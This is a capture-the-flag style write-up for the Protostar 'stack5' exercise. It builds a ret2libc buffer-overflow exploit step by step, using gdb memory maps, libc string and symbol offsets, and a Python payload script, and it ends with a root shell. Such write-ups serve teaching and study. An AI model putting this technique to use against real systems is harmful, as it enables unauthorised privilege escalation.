## stack5 - ret2libc
In this exercise you're supposed to use shellcode, but there are many ways to exploit this binary. In this writeup we'll 
use components available to us in libc to get a root shell. Specifically, we'll use the `system` and `exit` libc functions
combined with the address of the string `/bin/sh`.

### Overview
1. Find the overflow required to overwrite EIP
2. Find the base address / version for libc relative to the executable
3. Find the offset for the string within libc
4. Find the function addresses relative to the executable
5. Creating the payload

### The overflow
After trying some data sizes, it's found that 76 bytes overflows up to the EIP, with the following 4 bytes 
overwriting the EIP.

### Finding the base address / version
We'll use `GDB` to show the memory adress mapping for the 
executable, and use this information to get the base address and version for libc.

```bash
gdb -q stack5

(gdb) start
...

(gdb) i proc m
process 1701
cmdline = '/opt/protostar/bin/stack5'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/stack5'
Mapped address spaces:

        Start Addr   End Addr       Size     Offset objfile
         0x8048000  0x8049000     0x1000          0        /opt/protostar/bin/stack5
         0x8049000  0x804a000     0x1000          0        /opt/protostar/bin/stack5
        0xb7e96000 0xb7e97000     0x1000          0        
        0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
        0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
        0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
        0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
        0xb7fd9000 0xb7fdc000     0x3000          0        
        0xb7fe0000 0xb7fe2000     0x2000          0        
        0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
        0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
        0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
        0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
        0xbffeb000 0xc0000000    0x15000          0           [stack]
```
Here we can see that the version for libc is `libc-2.11.2.so`, and the base address is `0xb7e97000`.

### Finding the string
We need to provide `system` with a path to the system shell as an argument, so we need to find the string `/bin/sh` somewhere
acessible to our executable - since we're already utilising libc, we'll start with that. We'll use `strings` to see if the string exists, then use `objdump -s` to find the address of the string within the libc static object.

Let's verify that the string is somewhere in that libc version...
```bash
$ strings /lib/libc-2.11.2.so | egrep "/bin/sh"
/bin/sh
```

Ok, good, now we need to find the offset...
```bash
$ objdump -s /lib/libc-2.11.2.so | egrep -B1 -A1 "bin"

...

--
 11f3b0 6600696e 69747900 6e616e00 2d63002f  f.inity.nan.-c./
 11f3c0 62696e2f 73680065 78697420 30006361  bin/sh.exit 0.ca
 11f3d0 6e6f6e69 63616c69 7a652e63 005f5f72  nonicalize.c.__r
--

...

```
Here we can find that the offset is `0x11f3bf`. We can verify this in gdb by adding this offset to the base address, and reading a string at that location...
```bash
(gdb) p/x 0x11f3bf + 0xb7e97000
$1 = 0xb7fb63bf
(gdb) x/s 0xb7fb63bf
0xb7fb63bf:      "/bin/sh"
```

#### Edit** 
A faster way to find the offset using only `strings`...
```bash
$ strings -tx /lib/libc-2.11.2.so | egrep "/bin/sh"
 11f3bf /bin/sh
```

### Finding the function addresses
There are two ways this can be done, you can either use gdb to find the addresses at run-time
```bash
(gdb) p *system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>
(gdb) p *exit
$2 = {<text variable, no debug info>} 0xb7ec60c0 <*__GI_exit>
```

Or you can use the libc offsets (the same method used when finding the string)
```bash
$ objdump -d /lib/libc-2.11.2.so | egrep "<__libc_system>"
00038fb0 <__libc_system>:
$ objdump -d /lib/libc-2.11.2.so | egrep "<exit>"
0002f0c0 <exit>:
```

### Creating the exploit

```python
#!/usr/bin/python

import struct

def p(x): return struct.pack('<L', x)

padding  = "A"*76
shellstr = p(0xb7fb63bf)
syscall  = p(0xb7ecffb0)
exitcall = p(0xb7ec60c0)

print padding + syscall + exitcall + shellstr
```

```bash
$ (~/s5ex.py; cat) | /opt/protostar/bin/stack5

whoami
root

```